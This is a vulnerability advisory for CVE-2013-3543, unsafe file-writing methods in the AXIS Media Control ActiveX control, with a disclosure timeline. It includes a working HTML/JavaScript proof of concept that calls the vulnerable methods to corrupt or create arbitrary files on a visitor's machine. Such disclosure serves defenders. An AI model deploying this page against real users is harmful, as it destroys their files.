80 lines
No EOL
3.7 KiB
Text
80 lines
No EOL
3.7 KiB
Text
========================================================================
|
|
AXIS
|
|
====================================================================
|
|
========================================================================
|
|
|
|
1.Advisory Information
|
|
Title: AXIS Media Control ActiveX vulnerability
|
|
Date Published: 12/06/2013
|
|
Date of last updated: 12/06/2013
|
|
|
|
2.Vulnerability Description
|
|
A vulnerability has been found in this devices:
|
|
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)
|
|
|
|
3.Affected Products
|
|
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
|
|
The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012)
|
|
|
|
4.PoC
|
|
4.1.Exposed Unsafe ActiveX Method - File Corruption.
|
|
In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.”
|
|
Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
|
|
The vulnerability exists due to the ActiveX control including insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL.
|
|
This can be exploited to corrupt or create arbitrary files in the context of the current user.
|
|
In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods:
|
|
|
|
When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage:
|
|
|
|
The following code could be used to test the vulnerability:
|
|
_____________________________________________________________________________
|
|
<html>
|
|
<head>
|
|
<title></title>
|
|
<script language="javaScript" type="text/javascript">
|
|
function startRecord(){
|
|
var theFile = "FilePath//File_name_to_corrupt_or_create";
|
|
MyActiveX.StartRecord(theFile);
|
|
}
|
|
function saveCurrentImage(){
|
|
var theFile = "FilePath//File_name_to_corrupt_or_create";
|
|
var theFormat = 1;
|
|
MyActiveX.SaveCurrentImage(theFormat, theFile);
|
|
}
|
|
function startRecordMedia(){
|
|
var theFile = "FilePath//File_name_to_corrupt_or_create";
|
|
var theFlags = 1;
|
|
var theMediaTypes = "default"
|
|
MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
|
|
}
|
|
</script>
|
|
</head>
|
|
<body>
|
|
<object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
|
|
<param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
|
|
<param name="MediaType" value="mjpeg">
|
|
<param name="Volume" value="1">
|
|
<param name="ShowStatusBar" value="1">
|
|
<param name="ShowToolbar" value="1">
|
|
<param name="AutoStart" value="1">
|
|
<param name="UIMode" value="ptz-relative">
|
|
<param name="MediaType" value="mjpeg-unicast">
|
|
<param name="StretchToFit" value="0">
|
|
< param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi>
|
|
</object>
|
|
<br>
|
|
<INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
|
|
<INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
|
|
<INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
|
|
</body>
|
|
</html>
|
|
_____________________________________________________________________________
|
|
|
|
5.Credits
|
|
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.
|
|
|
|
6.Report Timeline
|
|
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
|
|
-2013-05-24: Axis team asks for a report with technical information.
|
|
-2013-05-26: Technical details sent to Axis.
|
|
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability. |